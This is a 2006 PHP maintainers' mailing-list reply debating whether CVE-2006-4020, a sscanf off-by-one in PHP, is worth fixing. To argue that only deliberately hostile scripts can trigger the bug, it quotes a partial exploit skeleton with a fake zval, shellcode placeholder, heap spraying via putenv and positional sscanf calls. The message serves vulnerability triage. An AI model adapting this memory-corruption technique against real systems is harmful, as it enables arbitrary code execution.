[php-maint] Re: another batch of php security issues for review

Martin Schulze joey at infodrom.org
Fri Sep 1 07:56:10 UTC 2006


Moritz Muehlenhoff wrote:
> Martin Schulze wrote:
> > > CVE-2006-4020 (scanf.c in PHP 5.1.4 and earlier, and 4.4.3 and earlier,
> > > allows ...)
> > > 
> > > 	"buffer underflow" could lead to code execution, though it
> > > 	isn't clear exactly how exploitable it is.  According to the
> > > 	patch:
> > > 
> > > 	http://bugs.php.net/bug.php?id=38322
> > > 
> > > 	looks like an off-by-one type error, with a simple enough fix, 
> > > 	anyway.
> > 
> > No, this is a non-issue.  It requires a malicious PHP script to work.
> > The attacker could just use popen(), system() or any other means PHP
> > offers.
> 
> We should fix this; it can be leveraged into code injection, and there
> seem to be applications which use it in a vulnerable manner.
> Also, the patch is easy to review and self-contained.

Please explain which application that is not written to exploit
this or another PHP bug contains PHP code like the following:

// $eip_hop_over, $ptr_to_obj_handlers, $shellcode, $ptr_to_ptr_to_zval
// and $ptr_to_zval are target-specific values that are not given here.

// Fake zval: handler pointers followed by the shellcode.
$object_zval = $eip_hop_over.$ptr_to_obj_handlers.$eip_hop_over.
               "\x05\x01\x90\x90".$shellcode."\xC3\x90\x90\x20";

// Fill a string with pointers to the fake zval, then free it.
$str = str_repeat($ptr_to_ptr_to_zval, 20);
unset($str);

// First sscanf() with a positional (%1$s) conversion into $str.
sscanf($object_zval, '%1$s', $str);

// Spray pointers to the zval through the environment, then clear it.
putenv("PHP_foo=".str_repeat($ptr_to_zval, 64));
putenv("PHP_foo=");

// Second sscanf() with the positional conversion.
sscanf("a ", '%1$s', $str);


It's not as if sscanf("a ", '%1$s', $str); per se opens a remote
code execution vulnerability; there are factors that also need
to be included, and they are only included if the PHP script is
written to exploit this one specifically.

Regards,

	Joey

-- 
If you come from outside of Finland, you live in wrong country.
	-- motd of irc.funet.fi